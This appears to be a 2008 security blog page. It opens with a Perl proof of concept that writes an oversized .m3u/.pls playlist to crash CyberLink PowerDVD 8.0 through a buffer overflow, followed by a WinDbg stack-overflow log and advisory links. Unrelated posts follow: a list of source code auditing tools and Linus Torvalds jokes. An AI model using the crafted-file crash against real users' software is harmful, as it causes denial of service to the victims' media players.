CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
PoC:
--------------------------
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
# Note: the WinDbg output below reports STATUS_STACK_OVERFLOW (c00000fd) with EIP still
# inside the PowerDVD image, i.e. the oversized playlist exhausts the stack; as published
# this is a crash PoC and does not show control of EIP.
#
$buffer = "J" x 520000;
open(m3u, ">./evil_list.m3u") || die "\nCan't open evil_list.m3u: $!"; # or .pls
print m3u "$buffer";
close(m3u);
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008
---------------------------------------------------------------------------------------------------------------------
(ea0.d4c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003e84 ebx=02890048 ecx=00032310 edx=02890049 esi=0007ef41 edi=0012cb2c
eip=0043fb37 esp=0012c308 ebp=0012cf4c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
image00400000+0x3fb37:
0043fb37 8501 test dword ptr [ecx],eax ds:0023:00032310=00000000
-------------------------------------------------------------------------------------------
http://zeroscience.org/codes/powerdvd_bof.txt
http://www.securityfocus.com/bid/30341/
http://www.packetstormsecurity.org/filedesc/powerdvd_bof.pl.txt.html
http://www.juniper.net/security/auto/vulnerabilities/vuln30341.html
http://www.venustech.com.cn/NewsInfo/124/1959.Html
http://www.maestro-sec.com/forum/viewtopic.php?t=588&f=19
http://www.hwupgrade.it/forum/showthread.php?p=23436246
24 June, 2008
List of Source Code Auditing tools
.TEST - [ C#, VB.NET, MC++ ] - http://www.parasoft.com/jsp/products.jsp
ASTRÉE - [ C ] - http://www.astree.ens.fr
Bandera - [ Java ] - http://bandera.projects.cis.ksu.edu/
BLAST - [ C ] - http://mtc.epfl.ch/software-tools/blast/
BOON - [ C ] - http://www.cs.berkeley.edu/~daw/boon/
C Code Analyzer (CCA) - [ C ] - http://www.drugphish.ch/~jonny/cca.html
C++test - [ C++ ] - http://www.parasoft.com/jsp/products.jsp
CCMetrics - [ C#, VB.NET ] - http://www.serviceframework.com/jwss/utility,ccmetrics,utility.aspx
Checkstyle - [ Java ] - http://checkstyle.sourceforge.net/
CodeCenter - [ C ] - http://www.ics.com/products/centerline/codecenter/features.html
CodeScan - [ .ASP, PHP ] - http://www.codescan.com/
CodeSecure - [ PHP, Java ] - http://www.armorize.com/corpweb/en/products/codesecure
CodeSonar - [ C, C++ ] - http://www.grammatech.com/products/codesonar/overview.html
CQual - [ C ] - http://www.cs.umd.edu/~jfoster/cqual
Csur - [ C ] - http://www.lsv.ens-cachan.fr/csur/
Dehydra - [ C++ ] - http://wiki.mozilla.org/Dehydra_GCC
DevInspect - [ C#, Visual Basic, JavaScript, VB Script] - http://www.spidynamics.com/products/devinspect/
DevPartner SecurityChecker - [ C#, Visual Basic ] - http://www.compuware.com/products/devpartner/securitychecker.htm
DoubleCheck - [ C, C++ ] - http://www.ghs.com/products/doublecheck.html
FindBugs - [ Java ] - http://findbugs.sourceforge.net/
FlawFinder - [ C, C++ ] - http://www.dwheeler.com/flawfinder/
Fluid - [ Java ] - http://www.fluid.cs.cmu.edu/
Frama-C - [ C ] - http://frama-c.cea.fr/
ftnchek - [ FORTRAN ] - http://www.dsm.fordham.edu/~ftnchek/
FxCop - [ .NET ] - http://code.msdn.microsoft.com/codeanalysis
g95-xml - [ FORTRAN ] - http://g95-xml.sourceforge.net/
ITS4 - [ C, C++ ] - http://www.cigital.com/its4/
Jlint - [ Java ] - http://artho.com/jlint/
JsLint - [ JavaScript ] - http://www.jslint.com/
Jtest - [ Java ] - http://www.parasoft.com/jsp/products.jsp
KlocWork / K7 - [ C, C++, Java ] - http://www.klocwork.com/products/k7_security.asp
LAPSE - [ Java ] - http://www.owasp.org/index.php/Category:OWASP_LAPSE_Project
MOPS - [ C ] - http://www.cs.berkeley.edu/~daw/mops/
MSSCASI - [ ASP ] - http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA&displaylang=en
MZTools - [ VB6, VBA ] - http://www.mztools.com/index.aspx/
Oink - [ C++ ] - http://www.cubewano.org/oink
Ounce - [ C, C++, Java, JSP, ASP.NET, VB.NET, C# ] - http://www.ouncelabs.com/accurate-complete-results.html
Perl-Critic - [ Perl ] - http://search.cpan.org/dist/Perl-Critic/
PLSQLScanner 2008 - [ PLSQL ] - http://www.red-database-security.com/software/plsqlscanner.html
PHP-Sat - [ PHP ] - http://www.program-transformation.org/PHP/PhpSat
Pixy - [ PHP ] - http://pixybox.seclab.tuwien.ac.at/pixy/index.php
PMD - [ Java ] - http://pmd.sourceforge.net/
PolySpace - [ Ada, C, C++ ] - http://www.polyspace.com/products.htm
PREfix & PREfast - [ C, C++ ] - http://support.microsoft.com/vst
Prevent - [ C, C++ ] - http://www.coverity.com/html/coverity-software-quality-products.html
PyChecker - [ Python ] - http://pychecker.sourceforge.net/
pylint - [ Python ] - http://www.logilab.org/project/pylint
QA-C, QA-C++, QA-J - [ C, C++, Java, FORTRAN ] - http://www.programmingresearch.com/PRODUCTS.html
QualityChecker - [ Visual Basic 6 ] - http://d.cr.free.fr/
RATS - [ C, C++, Perl, PHP, Python ] - http://www.fortify.com/security-resources/rats.jsp
RSM - [ C, C++, C#, Java ] - http://msquaredtechnologies.com/m2rsm/
Smatch - [ C ] - http://smatch.sourceforge.net/
SCA - [ ASP.NET, C, C++, C#, Java, JSP, PL/SQL, T-SQL, VB.NET, XML ] - http://www.fortifysoftware.com/products/sca/
Skavenger - [ PHP ] - http://code.google.com/p/skavenger/
smarty-lint - [ PHP ] - http://code.google.com/p/smarty-lint/
soot - [ Java ] - http://www.sable.mcgill.ca/soot/
Source Monitor - [ C#, VB.NET ] - http://www.campwoodsw.com/sm20.html
SPARK - [ Ada ] - http://www.praxis-his.com/sparkada/spark.asp
Spike PHP Security Audit Tool - [ PHP ] - http://developer.spikesource.com/projects/phpsecaudit/
Splint - [ C ] - http://www.splint.org/
SWAAT - [ PHP, ASP.NET, JSP, Java ] - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
UNO - [ C ] - http://spinroot.com/uno/
vil - [ C#, VB.NET ] - http://www.1bot.com/
Viva64 - [ C++ ] - http://www.viva64.com/
xg++ - [ C ] - http://www.stanford.edu/~engler/mc-osdi.pdf
YTKScan Java - [ Java ] - http://www.cam.org/~droujav/y2k/Y2KScan.html
t00t w00t ;)
23 June, 2008
Risk assessment
http://en.wikipedia.org/wiki/Risk_assessment
01 March, 2008
Linus Torvalds jokes
Linus Torvalds can run kill -9 and kill Chuck Norris.
Linus Torvalds doesn't die, he simply returns zero.
Linus Torvalds first written program had artificial intelligence.
Linus can divide by zero.
Linus Torvalds runs Linux on his wristwatch and toaster.
Linus Torvalds doesn't receive error messages.
There is no theory of probability, just a list of events that Linus Torvalds allows to occur.
Linus Torvalds does not sleep. He hacks.
Linus surfs the web using nothing but netcat.
Linus Torvalds can play 3D games in his head by interpreting the source code in real-time.
Linus made the red pill.
Linus Torvalds didn't learn from the University of Helsinki, the University of Helsinki learned from Linus Torvalds.
Linus Torvalds once developed a programming language so good that it makes python look like punch cards.
Linus Torvalds doesn't need to boot.
Linus is real, unless declared Integer.
Linus doesn't push the flush toilet button. He simply says "make clean".
Linus Torvalds has no dependencies.
Linus Torvalds takes one look at your desktop and knows which porn sites you visited. In the last ten years.
Linus can enrich himself simply by chowning your bank account. He does not do this because there is no challenge in it.
There are no man pages for Linus Torvalds, only god pages.
Linus Torvalds can do an infinite loop in five seconds... in his head.
Linus Torvalds doesn't wear glasses anymore not because he had laser eye surgery, but because he finally got his xorg.conf properly configured in his head.
Linus Torvalds can use a nice level lower than -20.
Linus Torvalds doesn't need to mount his drives.
Linus Torvalds doesn't debug.
Linus Torvalds can install Linux on a dead badger.
Linus Torvalds doesn't need backups. He just uploads his files and lets the world mirror them.
Linus Torvalds is taking over the world. Microsoft is just a diversion so that no one would suspect a mild mannered Finnish programmer.
Linus Torvalds already has Linux 3.0. He is just keeping it to himself to build suspense.
Linus Torvalds didn't design Linux to run on the 386. Intel designed the 386 to run Linux.
People pray to Jesus, but Jesus prays to Linus Torvalds.
Linus need not worry about Microsoft patent crap, he simply does `sudo mv /tmp/ms /dev/null`.
Linus Torvalds is more powerful than root.
If you could read Linus Torvalds' mind, you'd find that his stream of consciousness is entirely in binary.
Linus scared A and B away, so they had to make C.
Linus only has 2 buttons on his keyboard '1' and '0'
Linus’s kernel never panics.